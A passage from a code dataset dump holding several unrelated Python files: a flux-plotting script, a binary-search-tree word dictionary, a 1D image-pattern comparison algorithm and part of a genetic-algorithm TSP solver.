range(nepoch)] # storing the flux for each epoch\n\n\n\n f, axarr = plt.subplots(3, 2, figsize=(10,7), sharex=True, sharey=True)\n\n for i in range(len(axarr)):\n\n nonZero1 = ionData_flux1[2*i] > 0\n nonZero2 = ionData_flux2[2*i+1] > 0\n\n # left column\n axarr[i,0].plot(varx[nonZero1], np.log10(ionData_flux1[2*i][nonZero1]), color=colors[0], marker=markers[0])\n axarr[i,0].plot(varx[nonZero1], np.log10(ionData_flux2[2*i][nonZero1]), color=colors[1], marker=markers[1])\n # right column\n axarr[i,1].plot(varx[nonZero2], np.log10(ionData_flux1[2*i+1][nonZero2]), color=colors[0], marker=markers[0])\n axarr[i,1].plot(varx[nonZero2], np.log10(ionData_flux2[2*i+1][nonZero2]), color=colors[1], marker=markers[1])\n\n # ionData1 = herData.get(flux_WC, key='lineID', value=lineID[])\n # axarr2 = axarr.flatten()\n # axarr2_pos_indx = [0,1,4,5,8,9,2,3,6,7,10,11] # <- what's this?\n # counter = 0\n # for k in range(2):\n #\n # for i in range(ntrans):\n #\n # axarr2[axarr2_pos_indx[counter]].xaxis.set_major_locator(MaxNLocator(4))\n # axarr2[axarr2_pos_indx[counter]].yaxis.set_major_locator(MaxNLocator(4))\n #\n # for j in range(2):\n #\n # if k == 0:\n # # flux\n # flux = flux_array[i*nepoch:(i+1)*nepoch,j]\n # # print(flux[flux>0])\n # axarr2[axarr2_pos_indx[counter]].set_ylim(np.log10(1e-13),np.log10(1e-10))\n # # print(np.min(flux[flux>0]),np.max(flux[flux>0]))\n # axarr2[axarr2_pos_indx[counter]].set_title(line[i])\n # # axarr2[axarr2_pos_indx[counter]].xaxis.set_major_locator(MaxNLocator(4))\n # # axarr2[axarr2_pos_indx[counter]].yaxis.set_major_locator(MaxNLocator(4))\n # axarr2[axarr2_pos_indx[counter]].plot(epoch[flux>0], np.log10(flux[flux>0]),\n # label='{}'.format(legentTextID[j]),\n # linestyle='None',\n # marker=markers[j],\n # color=colors[j])\n # else:\n # # flux normalized at apastron\n # flux = flux_array[i*nepoch:(i+1)*nepoch,j] / flux_array[i*nepoch+3,j] # <-- ERROR HERE\n # axarr2[axarr2_pos_indx[counter]].set_ylim(0.0,1.5)\n # axarr2[axarr2_pos_indx[counter]].set_title(line[i])\n # # axarr2[axarr2_pos_indx[counter]].xaxis.set_major_locator(MaxNLocator(4))\n # # axarr2[axarr2_pos_indx[counter]].yaxis.set_major_locator(MaxNLocator(3))\n # axarr2[axarr2_pos_indx[counter]].plot(epoch[flux>0], flux[flux>0],\n # label='{}'.format(legentTextID[j]),\n # linestyle='None',\n # marker=markers[j],\n # color=colors[j])\n #\n # axarr2[axarr2_pos_indx[counter]].axvline(x=13, color='0.5', ls='--', marker=' ', zorder=0, lw=1)\n #\n # if k == 0 and i == 1:\n # handles, labels = axarr2[axarr2_pos_indx[counter]].get_legend_handles_labels()\n # axarr2[axarr2_pos_indx[counter]].legend(handles, labels, loc='best', ncol=1, numpoints=1, frameon=True, fontsize=leg_fontsize)\n #\n # counter+=1\n\n plt.savefig('panel_flux2.eps')\n fix_bbox('panel_flux2.eps')\n plt.close(f)\n","sub_path":"herMeasure.py","file_name":"herMeasure.py","file_ext":"py","file_size_in_byte":13360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"521431612","text":"import pickle\r\nimport random\r\nimport os\r\n\r\ndef make_askii(word):\r\n\r\n res = ''\r\n for l in word:\r\n res += str(ord(l))\r\n return int(res)\r\n\r\nclass Node(object):\r\n\r\n def __init__(self, data, mean):\r\n self.word = data\r\n self.left = self.right = None\r\n self.data = make_askii(data)\r\n self.mean = mean\r\n\r\nclass BinarySearchTree(object):\r\n\r\n def __init__(self):\r\n\r\n self.root = None\r\n\r\n def insert(self, data, mean):\r\n self.root = self._insert_value(self.root, data, mean)\r\n return 'inserted'\r\n\r\n def _insert_value(self, node, data, mean):\r\n if node is None:\r\n node = Node(data, mean)\r\n else:\r\n if make_askii(data) <= node.data:\r\n node.left = self._insert_value(node.left, data, mean)\r\n else:\r\n node.right = self._insert_value(node.right, data, mean)\r\n return node\r\n\r\n def find(self, key):\r\n return self._find_value(self.root, make_askii(key))\r\n\r\n def _find_value(self, root, key):\r\n if root is None or root.data == key:\r\n try:\r\n return root.mean\r\n except:\r\n return ('is not in dictionary.')\r\n elif key < root.data:\r\n return self._find_value(root.left, key)\r\n else:\r\n return self._find_value(root.right, key)\r\n\r\n def delete(self, key):\r\n self.root, deleted = self._delete_value(self.root, make_askii(key))\r\n if deleted == True:\r\n return 'deleted'\r\n else: return 'word is not in dictionary'\r\n\r\n def _delete_value(self, node, key):\r\n if node is None:\r\n return node, False\r\n deleted = False\r\n if key == node.data:\r\n deleted = True\r\n if node.left and node.right:\r\n parent, child = node, node.right\r\n while child.left is not None:\r\n parent, child = child, child.left\r\n child.left = node.left\r\n if parent != node:\r\n parent.left = child.right\r\n child.right = node.right\r\n node = child\r\n elif node.left or node.right:\r\n node = node.left or node.right\r\n else:\r\n node = None\r\n elif key < node.data:\r\n node.left, deleted = self._delete_value(node.left, key)\r\n else:\r\n node.right, deleted = self._delete_value(node.right, key)\r\n return node, deleted\r\n\r\n def pre_order_traversal(self):\r\n def _pre_order_traversal(root):\r\n if root is None:\r\n pass\r\n else:\r\n print(root.word + ':', root.mean)\r\n\r\n _pre_order_traversal(root.left)\r\n _pre_order_traversal(root.right)\r\n _pre_order_traversal(self.root)\r\n\r\n def in_order_traversal(self):\r\n def _in_order_traversal(root):\r\n if root is None:\r\n pass\r\n else:\r\n _in_order_traversal(root.left)\r\n print(root.word + ':', root.mean)\r\n\r\n _in_order_traversal(root.right)\r\n\r\n _in_order_traversal(self.root)\r\n\r\n def post_order_traversal(self):\r\n def _post_order_traversal(root):\r\n if root is None:\r\n pass\r\n else:\r\n _post_order_traversal(root.left)\r\n _post_order_traversal(root.right)\r\n print(root.word + ':', root.mean)\r\n\r\n _post_order_traversal(self.root)\r\n\r\n def level_order_traversal(self):\r\n def _level_order_traversal(root):\r\n queue = [root]\r\n while queue:\r\n root = queue.pop(0)\r\n if root is not None:\r\n print(root.word+':', root.mean)\r\n if root.left:\r\n queue.append(root.left)\r\n if root.right:\r\n queue.append(root.right)\r\n _level_order_traversal(self.root)\r\n\r\ndef insert_data():\r\n\r\n def read_file(filename):\r\n words = []\r\n f = open(filename, 'r')\r\n while True:\r\n line = f.readline()\r\n if not line:\r\n break\r\n line = line.split()\r\n words.append((line[0], ' '.join(line[1:])))\r\n f.close()\r\n random.shuffle(words)\r\n return words\r\n\r\n Dictionary = BinarySearchTree()\r\n words = read_file(\"words.txt\")\r\n\r\n for word, mean in words:\r\n Dictionary.insert(word, mean)\r\n\r\n with open('data.pickle', 'wb') as f:\r\n pickle.dump(Dictionary, f, pickle.HIGHEST_PROTOCOL)\r\n\r\ndef cls():\r\n os.system('cls' if os.name=='nt' else 'clear')\r\n\r\ndef mainloop():\r\n\r\n insert_data()\r\n with open('data.pickle', 'rb') as f:\r\n data = pickle.load(f)\r\n\r\n while True:\r\n a = input()\r\n if a.split()[0] == 'find':\r\n cls()\r\n print(a[5:] + ':', data.find(a[5:]))\r\n\r\n elif a.split()[0] == 'delete':\r\n cls()\r\n try:\r\n print(a[7:], data.delete(a[7:]))\r\n except:\r\n print('try again')\r\n\r\n elif a.split()[0] == 'insert':\r\n cls()\r\n try:\r\n print(a.split()[1], data.insert(a.split()[1], ' '.join(a.split()[2:])))\r\n except:\r\n print('try again')\r\n\r\n elif a == 'pre order traversal':\r\n cls()\r\n data.pre_order_traversal()\r\n\r\n elif a == 'in order traversal':\r\n cls()\r\n data.in_order_traversal()\r\n\r\n elif a == 'post order traversal':\r\n cls()\r\n data.post_order_traversal()\r\n\r\n elif a == 'level order traversal':\r\n cls()\r\n data.level_order_traversal()\r\n\r\n elif a == 'quit':\r\n cls()\r\n print('quit dictionary.')\r\n exit()\r\n\r\n elif a == 'save':\r\n with open('data.pickle', 'wb') as f:\r\n pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)\r\n cls()\r\n print('save')\r\n\r\n else:\r\n cls()\r\n print('wrong command.\\n '\r\n 'find [word]: finding word\\n '\r\n 'delete [word]: deleting word\\n '\r\n 'insert [word] [meaning]: inserting word\\n '\r\n 'pre order traversal\\n '\r\n 'in order traversal\\n '\r\n 'post order traversal\\n '\r\n 'level order traversal\\n '\r\n 'quit: quit dictionary')\r\n\r\nif __name__ == '__main__':\r\n mainloop()","sub_path":"Dictionary/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"394395944","text":"import cv2\nimport argparse\nfrom time import time\nfrom line_1D_alg.utils import *\nfrom itertools import zip_longest\n\n'''\n line_patterns is a principal version of 1st-level 1D algorithm, contains operations:\n\n- Cross-compare consecutive pixels within each row of image, forming dert_ queue of derts: tuples of derivatives per pixel.\n dert_ is then segmented into patterns mPs and dPs: contiguous sequences of pixels forming same-sign match or difference.\n Initial match is inverse deviation of variation: m = ave_|d| - |d|, rather than minimum for directly defined match:\n albedo or intensity of reflected light doesn't correlate with predictive value of the object that reflects it.\n\n- Match patterns mPs are spans of inputs forming same-sign match. Positive mPs contain high-match pixels, which are likely\n to match more distant pixels. Thus, positive mPs are evaluated for cross-comp of pixels over incremented range.\n- Difference patterns dPs are spans of inputs forming same-sign ds. d sign match is a precondition for d match, so only\n same-sign spans (dPs) are evaluated for cross-comp of constituent differences, which forms higher derivatives.\n (d match = min: rng+ comp value: predictive value of difference is proportional to its magnitude, although inversely so)\n\n Both extended cross-comp forks are recursive: resulting sub-patterns are evaluated for deeper cross-comp, same as top patterns.\n Both forks currently process all inputs (full overlap), but they can be exclusive or partly overlapping to reduce redundancy.\n\n Initial bi-lateral cross-comp here is 1D slice of 2D 3x3 kernel, while uni-lateral d is equivalent to 2x2 kernel.\n Odd kernels preserve resolution of pixels, while 2x2 kernels preserve resolution of derivatives, in resulting derts.\n The former should be used in rng_comp and the latter in der_comp, which may alternate with intra_P.\n\n postfix '_' denotes array name, vs. same-name elements\n prefix '_' denotes prior of two same-name variables\n prefix 'f' denotes binary flag\n '''\n# pattern filters or hyper-parameters: eventually from higher-level feedback, initialized here as constants:\n\nave = 15 # |difference| between pixels that coincides with average value of mP - redundancy to overlapping dPs\nave_min = 2 # for m defined as min |d|: smaller?\nave_M = 50 # min M for initial incremental-range comparison(t_), higher cost than der_comp?\nave_D = 5 # min |D| for initial incremental-derivation comparison(d_)\nave_nP = 5 # average number of sub_Ps in P, to estimate intra-costs? ave_rdn_inc = 1 + 1 / ave_nP # 1.2\nave_rdd = .5 # average dd / d, for projection: uni_d *= 1.5?\nini_y = 500\n\n\ndef cross_comp(frame_of_pixels_): # converts frame_of_pixels to frame_of_patterns, each pattern maybe nested\n\n Y, X = image.shape # Y: frame height, X: frame width\n frame_of_patterns_ = []\n\n for y in range(ini_y + 1, Y): # y is index of new line pixel_, initialization:\n pixel_ = frame_of_pixels_[y, :]\n dert_ = []\n __p, _p = pixel_[0:2] # each prefix '_' denotes prior\n _d = _p - __p # initial comp\n _m = ave - abs(_d)\n dert_.append((__p, _d * 1.5, _m * 1.5, None)) # back-project _d and _m to bilateral values\n\n for p in pixel_[2:]: # pixel p is compared to prior pixel _p in a row\n d = p - _p\n m = ave - abs(d) # initial match is inverse deviation of |difference|\n dert_.append((_p, d + _d, m + _m, _d)) # pack dert: prior p, bilateral difference and match, prior d\n _p, _d, _m = p, d, m\n dert_.append((_p, _d * 1.5, _m * 1.5, _d)) # or unilateral d only? forward-project last d and m to bilateral values\n\n dP_ = form_P_(dert_, fdP=True) # forms d-sign patterns\n intra_P(dP_, fdP=True, fid=True, rdn=1, rng=2) # evaluates sub-recursion per dP\n mP_ = form_P_(dert_, fdP=False) # forms m-sign patterns\n intra_P(mP_, fdP=False, fid=False, rdn=1, rng=3) # evaluates sub-recursion per mP\n\n frame_of_patterns_ += [(dP_, mP_)] # line of patterns is added to frame of patterns\n return frame_of_patterns_ # frame of patterns will be output to level 2\n\n\ndef form_P_(P_dert_, fdP): # pattern initialization, accumulation, termination, parallel der+ and rng+?\n\n P_ = [] # initialization:\n if fdP: # flag dP, selects between form_dP_ and form_mP_ forks, criterion is uni_d vs. m\n p, d, m, uni_d = P_dert_[1] # skip dert_[0]: _uni_d belong to prior dP\n _sign = uni_d > 0\n ini_dert = 2\n else:\n p, d, m, uni_d = P_dert_[0]\n _sign = m > 0\n ini_dert = 1\n dLL, rLL, L, I, D, M, dert_, dsub_, rsub_ = [], [], 1, p, 0, m, [(p, d, m, uni_d)], [], []\n # LL: depth of sub-hierarchy, each sub-pattern in sub_ is nested to depth = sub_[n], 1st uni_d is skipped\n\n for p, d, m, uni_d in P_dert_[ini_dert:]: # cluster P_derts by m | uni_d sign\n if fdP:\n sign = uni_d > 0\n else:\n sign = m > 0\n if sign != _sign: # sign change: terminate P\n P_.append((_sign, dLL, rLL, L, I, D, M, dert_, dsub_, rsub_))\n dLL, rLL, L, I, D, M, dert_, dsub_, rsub_ = [], [], 0, 0, 0, 0, [], [], []\n # reset accumulated params\n L += 1;\n I += p;\n D += uni_d;\n M += m # accumulate params, bilateral m: for eval per pixel\n dert_ += [(p, d, m, uni_d)]\n _sign = sign\n\n P_.append((_sign, dLL, rLL, L, I, D, M, dert_, dsub_, rsub_)) # incomplete P\n # also sum Dert per P_?\n return P_\n\n\n''' Recursion in intra_P extends pattern with sub_: hierarchy of sub-patterns, to be adjusted by macro-feedback:\n P_:\n fdP, # flag: select dP or mP forks in form_P_ and intra_P\n fid, # flag: input is derived: magnitude correlates with predictive value: m = min-ave, else m = ave-|d|\n rdn, # redundancy to higher layers, possibly lateral overlap of rng+ & der+, rdn += 1 * typ coef?\n rng, # comparison range\n P:\n sign, # of core param: m | d\n Dert = L, I, D, M,\n dert_, # input for extended comp\n dsub_, # multiple layers of (hyper, Dert, sub_P_) from segment or extended comp, nested to depth = sub_[n],\n rsub_, # for layer-parallel access and comp, similar to frequency domain representation\n # sub_P_: flat or nested for mapping to higher-layer sub_P_ element?\n root # reference to higher P for layer-sequential feedback\n\n orders of composition: 1st: dert_, 2nd: lateral_sub_( derts), 3rd: sub_( lateral_sub_( derts))?\n line-wide layer-sequential recursion and feedback, for clarity and slice-mapped SIMD processing?\n'''\n\n\ndef intra_P(P_, fdP, fid, rdn, rng): # evaluate for sub-recursion in line P_, filling its sub_P_ with the results\n\n deep_sub_ = [] # intra_P recursion extends rsub_ and dsub_ hierarchies by sub_P_ layer\n ext_dert_ = [] # new dert_ from extended- range or derivation comp\n\n for sign, dLL, rLL, L, I, D, M, dert_, dsub_, rsub_ in P_: # each sub in sub_ is nested to depth = sub_[n]\n\n if fdP: # P = dP: d sign match is partial d match, precondition for der+, or in -mPs to avoid overlap\n if abs(D) > ave_D * rdn and L > 3: # cross-comp uni_ds at rng+1:\n ext_dert_ = der_comp(dert_)\n else:\n ext_dert_ = []\n elif sign: # P = +mP: low-variation span, eval comp at rng*3 (2+1): 1, 3, 9, kernel: 3, 7, 19\n if M > ave_M * rdn and L > 4: # skip comp predictable next dert:\n ext_dert_ = rng_comp(dert_, fid)\n else:\n ext_dert_ = [] # also merge not-selected P into non_P?\n if ext_dert_:\n sub_dP_ = form_P_(ext_dert_, True);\n lL = len(sub_dP_)\n dsub_ += [[(lL, True, True, rdn, rng, sub_dP_)]] # 1st layer: lL, fdP, fid, rdn, rng, sub_P_\n dsub_ += intra_P(sub_dP_, True, True, rdn + 1 + 1 / lL, rng + 1) # deep layers feedback\n dLL[:] = [len(dsub_)] # deeper P rdn + 1: rdn to higher derts, + 1 / lL: rdn to higher sub_\n\n sub_mP_ = form_P_(ext_dert_, False);\n lL = len(sub_mP_)\n rsub_ += [[(lL, False, fid, rdn, rng, sub_mP_)]] # 1st layer, Dert=[], fill if lL > min?\n rsub_ += intra_P(sub_mP_, False, fid, rdn + 1 + 1 / lL, rng * 2 + 1) # deep layers feedback\n rLL[:] = [len(rsub_)]\n\n deep_sub_ = [deep_sub + dsub + rsub for deep_sub, dsub, rsub in zip_longest(deep_sub_, dsub_, rsub_, fillvalue=[])]\n # deep_rsub_ and deep_dsub_ are spliced into deep_sub_ hierarchy\n # fill layer Dert if n_sub_P > min\n return deep_sub_\n\n\ndef rng_comp(dert_, fid): # skip odd derts for sparse rng+ comp: 1 skip / 1 add, to maintain 2x overlap\n\n rdert_ = [] # prefix '_' denotes the prior of same-name variables, initialization:\n (__i, __short_bi_d, __short_bi_m, _), _, (_i, _short_bi_d, _short_bi_m, _) = dert_[0:3]\n _d = _i - __i\n if fid:\n _m = min(__i, _i) - ave_min;\n else:\n _m = ave - abs(_d) # no ave * rng: actual m and d value is cumulative?\n _bi_d = _d * 1.5 + __short_bi_d\n _bi_m = _m * 1.5 + __short_bi_m # back-project _m and d\n rdert_.append((__i, _bi_d, _bi_m, None))\n\n for n in range(4, len(dert_), 2): # backward comp, ave | cumulative ders and filters?\n i, short_bi_d, short_bi_m = dert_[n][:3] # shorter-rng dert\n d = i - _i\n if fid:\n m = min(i, _i) - ave_min # match = min: magnitude of derived vars correlates with stability\n else:\n m = ave - abs(d) # inverse match: intensity doesn't correlate with stability\n bi_d = _d + d + _short_bi_d # bilateral difference, accum in rng\n bi_m = _m + m + _short_bi_m # bilateral match, accum in rng\n rdert_.append((_i, bi_d, bi_m, _d))\n _i, _d, _m, _short_bi_d, _short_bi_m = i, d, m, short_bi_d, short_bi_m\n\n rdert_.append((_i, _d * 1.5 + _short_bi_d, _m * 1.5 + _short_bi_m, _d))\n # forward-project unilateral to bilateral d and m values\n return rdert_\n\n\ndef der_comp(dert_): # cross-comp consecutive uni_ds in same-sign dert_: sign match is partial d match\n # dd and md may match across d sign, but likely in high-match area, spliced by spec in comp_P?\n\n ddert_ = [] # initialization:\n (_, _, _, __i), (_, _, _, _i) = dert_[1:3] # each prefix '_' denotes prior\n __i = abs(__i);\n _i = abs(_i)\n _d = _i - __i # initial comp\n _m = min(__i, _i) - ave_min\n ddert_.append((__i, _d * 1.5, _m * 1.5, None)) # __d and __m are back-projected as = _d or _m\n\n for dert in dert_[3:]:\n i = abs(dert[3]) # unilateral d in same-d-sign seg, no sign comp\n d = i - _i # d is dd\n m = min(i, _i) - ave_min # md = min: magnitude of derived vars corresponds to predictive value\n bi_d = _d + d # bilateral d-difference per _i\n bi_m = _m + m # bilateral d-match per _i\n ddert_.append((_i, bi_d, bi_m, _d))\n _i, _d, _m = i, d, m\n\n ddert_.append((_i, _d * 1.5, _m * 1.5, _d)) # forward-project unilateral to bilateral d and m values\n return ddert_\n\n\nif __name__ == \"__main__\":\n # Parse argument (image)\n argument_parser = argparse.ArgumentParser()\n argument_parser.add_argument('-i', '--image',\n help='path to image file',\n default='.//raccoon.jpg')\n arguments = vars(argument_parser.parse_args())\n # Read image\n image = cv2.imread(arguments['image'], 0).astype(int) # load pix-mapped image\n assert image is not None, \"Couldn't find image in the path!\"\n image = image.astype(int)\n # same image loaded online, without cv2:\n # from scipy import misc\n # image = misc.face(gray=True).astype(int)\n\n start_time = time()\n # Main\n frame_of_patterns_ = cross_comp(image)\n end_time = time() - start_time\n print(end_time)\n\n'''\n2nd level cross-compares resulting patterns Ps (s, L, I, D, M, r, nested e_) and evaluates them for deeper cross-comparison.\nDepth of cross-comparison (discontinuous if generic) is increased in lower-recursion e_, then between same-recursion e_s:\n\ncomp (s)? # same-sign only\n comp (L, I, D, M)? # in parallel or L first, equal-weight or I is redundant?\n cross_comp (sub_)? # same-recursion (derivation) order e_\n cross_comp (dert_)\n\nThen extend this 2nd level alg to a recursive meta-level algorithm\n\nfor partial overlap:\n\ndef form_mP_(dert_): # initialization, accumulation, termination\n\n _sign, LL, L, I, D, M, dert_, sub_ = P # each sub in sub_ is nested to depth = sub_[n]\n p, d, m, uni_d = dert\n sign = m > 0\n if sign != _sign:\n # sign change: terminate P\n P_.append((_sign, LL, L, I, D, M, dert_, sub_)) # LL(sub_ depth), L (len dert_) for visibility only\n LL, L, I, D, M, dert_, sub_ = [], 0, 0, 0, 0, [], [] # reset accumulated params\n # accumulate params with bilateral values:\n L += 1; I += p; D += d; M += m\n dert_ += [(p, d, m, uni_d)] # uni_d for der_comp and segment\n P = sign, LL, L, I, D, M, dert_, sub_ # sub_ is accumulated in intra_P\n\n return P, P_\n\ndef form_dP_(dert_): # P segmentation by same d sign: initialization, accumulation, termination\n\n sub_ = [] # becomes lateral_sub_\n _p, _d, _m, _uni_d = dert_[0] # prefix '_' denotes prior\n try:\n _sign = _uni_d > 0; ini = 1\n except:\n _p, _d, _m, _uni_d = dert_[1] # skip dert_[0] if uni_d is None: 1st dert in comp sequence\n _sign = _uni_d > 0; ini = 2\n\n if _uni_d > min_d: md_sign = 1 # > variable cost of der+\n else: md_sign = 0 # no der+ eval\n\n LL, L, I, D, M, seg_dert_ = [], 1, _p, _uni_d, _m, [(_p, _d, _m, _uni_d)] # initialize dP\n\n for p, d, m, uni_d in dert_[ini:]:\n sign = uni_d > 0\n if _sign != sign:\n sub_.append((_sign, LL, L, I, D, M, seg_dert_, [])) # terminate seg_P, same as P\n LL, L, I, D, M, seg_dert_, sub_ = [], 0, 0, 0, 0, [], [] # reset accumulated seg_P params\n _sign = sign\n L += 1; I += p; D += uni_d; M += m # D += uni_d to eval for comp uni_d\n seg_dert_.append((p, d, m, uni_d))\n\n sub_.append((_sign, LL, L, I, D, M, seg_dert_, [])) # pack last segment, nothing to accumulate\n # also Dert in sub_ [], fill if min lLL?\n return sub_ # becomes lateral_sub_\n\ndef splice(listOfLists, *otherLoLs, fillvalue=[]):\n \"Splice nested lists laterally.\"\n return [[*flatten(li)] for li in zip_longest(listOfLists, *otherLoLs, fillvalue=fillvalue)]\n\n flatten = lambda l: [item for sublist in l for item in sublist]\n r_deep_sub_, d_deep_sub_ = intra_P(sub_dP_, True, True, sub_rdn + 1.2, rng) # deep layers feedback\n d_sub_ += [flatten([flatten(r_deep_sub_), flatten(d_deep_sub_)])]\n\n r_deep_sub_, d_deep_sub_ = intra_P(sub_mP_, False, fid, sub_rdn + 1.2, rng + 1)\n r_sub_ += [flatten([flatten(r_deep_sub_), flatten(d_deep_sub_)])]\n\n if rdn > 1: rdn += 1 / lL - 0.2 # adjust distributed part of estimated rdn\n [len(rsub) for rsub in rsub_]\n'''\n","sub_path":"line_1D_alg/alternative versions/line_bi_d.py","file_name":"line_bi_d.py","file_ext":"py","file_size_in_byte":15033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"118838908","text":"\n\n\"\"\"\nAuthor: Sriranjani Sridharan\nfile: TSP_R00182510.py\n\"\"\"\n\nimport random\nfrom myIndividual import *\nimport sys\n\nmyStudentNum = 182510 # Replace 12345 with your student number\nrandom.seed(myStudentNum)\n\nclass TSP:\n def __init__(self, _fName, _popSize, _mutationRate, _maxIterations,_initial_soln,_selection,_crosssover_type,_mutation_type):\n \"\"\"\n Parameters and general variables\n \"\"\"\n\n self.population = []\n self.matingPool = []\n self.best = None\n self.popSize = _popSize\n self.genSize = None\n self.mutationRate = _mutationRate\n self.maxIterations = _maxIterations\n self.iteration = 0\n self.fName = _fName\n self.data = {}\n self.initial_soln = _initial_soln\n self.selection = _selection\n self.crossover_type = _crosssover_type\n self.mutation_type = _mutation_type\n\n self.readInstance()\n\n if self.initial_soln == 'Rand':\n self.initPopulation()\n elif self.initial_soln == 'Heuristic':\n self.heuristicPopulation()\n else:\n print('Incorrect Input - Enter a valid Initial Solution')\n\n\n def readInstance(self):\n \"\"\"\n Reading an instance from fName\n \"\"\"\n file = open(self.fName, 'r')\n self.genSize = int(file.readline())\n self.data = {}\n for line in file:\n (id, x, y) = line.split()\n self.data[int(id)] = (int(x), int(y))\n file.close()\n\n def initPopulation(self):\n \"\"\"\n Creating random individuals in the population\n \"\"\"\n for i in range(0, self.popSize):\n individual = Individual(self.genSize, self.data)\n individual.computeFitness()\n self.population.append(individual)\n\n self.best = self.population[0].copy()\n for ind_i in self.population:\n if self.best.getFitness() > ind_i.getFitness():\n self.best = ind_i.copy()\n print (\"Best initial sol: \",self.best.getFitness())\n\n def heuristicPopulation(self):\n \"\"\"\n Creating heuristic solution based individuals in the population\n \"\"\"\n for i in range(0, self.popSize):\n individual = Individual(self.genSize, self.data)\n genes_old = individual.genes\n ind = random.randint(0, self.genSize-1)\n\n genes_new = [genes_old[ind]]\n del genes_old[ind]\n\n current_gene = genes_new[0]\n while(len(genes_old) > 0):\n Agene = genes_old[0]\n Acost = individual.euclideanDistance(current_gene,Agene)\n Aindex = 0\n for i in range(1,len(genes_old)):\n gene = genes_old[i]\n cost = individual.euclideanDistance(current_gene,gene)\n if Acost > cost:\n Acost = cost\n Agene = gene\n Aindex = i\n current_gene = Agene\n genes_new.append(current_gene)\n del genes_old[Aindex]\n\n individual.setGene(genes_new)\n individual.computeFitness()\n self.population.append(individual)\n\n self.best = self.population[0].copy()\n for ind_i in self.population:\n if self.best.getFitness() > ind_i.getFitness():\n self.best = ind_i.copy()\n print(\"Best initial sol: \", self.best.getFitness())\n\n def updateBest(self, candidate):\n \"\"\"\n print the updated best results as iterations process\n \"\"\"\n if self.best == None or candidate.getFitness() < self.best.getFitness():\n self.best = candidate.copy()\n print (\"iteration: \",self.iteration, \"best: \",self.best.getFitness())\n\n def randomSelection(self):\n \"\"\"\n Random (uniform) selection of two individuals\n \"\"\"\n indA = self.matingPool[ random.randint(0, self.popSize-1) ]\n indB = self.matingPool[ random.randint(0, self.popSize-1) ]\n return [indA, indB]\n\n def stochasticUniversalSampling(self):\n \"\"\"\n Stochastic universal sampling Selection Implementation\n \"\"\"\n\n fitness = []\n indices = []\n fitness_range = [0]\n item = 0\n\n select_num = self.popSize\n\n for ind_i in self.matingPool:\n fitness.append(ind_i.getFitness())\n\n fitness = [1/x for x in fitness]\n fitness_sum = sum(fitness)\n fitness_transformed = [x / fitness_sum for x in fitness]\n fitness_transformed_sum = sum(fitness_transformed)\n\n\n for i in range(len(fitness_transformed)):\n item += fitness_transformed[i]\n fitness_range.append(item)\n\n distance = fitness_transformed_sum / select_num\n pointer = random.uniform(0, distance)\n current_point = pointer\n\n for i in range(select_num):\n for j in range(0, len(fitness_range)):\n if current_point <= fitness_range[j]:\n indices.append(j-1)\n break\n current_point += pointer\n\n indA = self.matingPool[random.choice(indices)]\n indB = self.matingPool[random.choice(indices)]\n\n return [indA, indB]\n\n def uniformCrossover(self, indA, indB):\n \"\"\"\n Uniform Crossover Implementation\n \"\"\"\n childA = []\n childB = []\n j = 0\n k = 0\n\n size = random.randint(0, self.genSize-1)\n indices = (random.sample(range(0, self.genSize-1), size))\n indices.sort()\n\n tmpA = [indA.genes[i] for i in indices]\n tmpB = [indB.genes[i] for i in indices]\n\n auxA = [i for i in indB.genes if i not in tmpA]\n auxB = [i for i in indA.genes if i not in tmpB]\n\n for i in range(0, self.genSize):\n if i in indices:\n childA.append(tmpA[j])\n childB.append(tmpB[j])\n j += 1\n else:\n childA.append(auxA[k])\n childB.append(auxB[k])\n k += 1\n return childA,childB\n\n def PMXmap(self,num,tmp1,tmp2):\n \"\"\"\n Mapping of randomly selected genes in PMX Crossover Implementation\n \"\"\"\n for i in range(0, len(tmp1)):\n if num == tmp1[i]:\n temp = tmp2[i]\n if temp in tmp1:\n return self.PMXmap(temp, tmp1, tmp2)\n else:\n return tmp2[i]\n\n\n def pmxCrossover(self, indA, indB):\n \"\"\"\n PMX Crossover Implementation\n \"\"\"\n childA = []\n childB = []\n j = 0\n\n randA = random.randint(0, self.genSize-1)\n randB = random.randint(0, self.genSize-1)\n\n indexA = min(randA, randB)\n indexB = max(randA, randB)\n\n tmpA = [indB.genes[i] for i in range(0, self.genSize) if (i >= indexA and i <= indexB)]\n tmpB = [indA.genes[i] for i in range(0, self.genSize) if (i >= indexA and i <= indexB)]\n\n if indexA == 0 and indexB == self.genSize-1:\n childA = tmpA\n else:\n for i in range(0, self.genSize):\n if i >= indexA and i <= indexB:\n childA.append(tmpA[j])\n j += 1\n else:\n if indA.genes[i] in tmpA:\n mappedA = self.PMXmap(indA.genes[i],tmpA,tmpB)\n childA.append(mappedA)\n else:\n childA.append(indA.genes[i])\n\n j = 0\n if indexA == 0 and indexB == self.genSize-1:\n childB = tmpB\n else:\n for i in range(0, self.genSize):\n if i >= indexA and i <= indexB:\n childB.append(tmpB[j])\n j += 1\n else:\n if indB.genes[i] in tmpB:\n mappedB = self.PMXmap(indB.genes[i],tmpB,tmpA)\n childB.append(mappedB)\n else:\n childB.append(indB.genes[i])\n\n return childA, childB\n\n def reciprocalExchangeMutation(self, ind):\n \"\"\"\n Reciprocal Exchange Mutation implementation\n Mutate an individual with certain probability (i.e., mutation rate)\n \"\"\"\n if random.random() > self.mutationRate:\n return\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n tmp = ind.genes[indexA]\n ind.genes[indexA] = ind.genes[indexB]\n ind.genes[indexB] = tmp\n\n ind.computeFitness()\n self.updateBest(ind)\n\n def inversionMutation(self, ind):\n \"\"\"\n Inversion Mutation implementation\n Mutate an individual with certain probability (i.e., mutation rate)\n \"\"\"\n if random.random() > self.mutationRate:\n return\n tmp = []\n res = []\n j = 0\n\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n indA = min(indexA, indexB)\n indB = max(indexA, indexB)\n\n [tmp.append(ind.genes[i]) for i in range(self.genSize) if (i >= indA and i <= indB)]\n tmp = tmp[::-1]\n\n for i in range(0, self.genSize):\n if i >= indA and i <= indB:\n res.append(tmp[j])\n j += 1\n 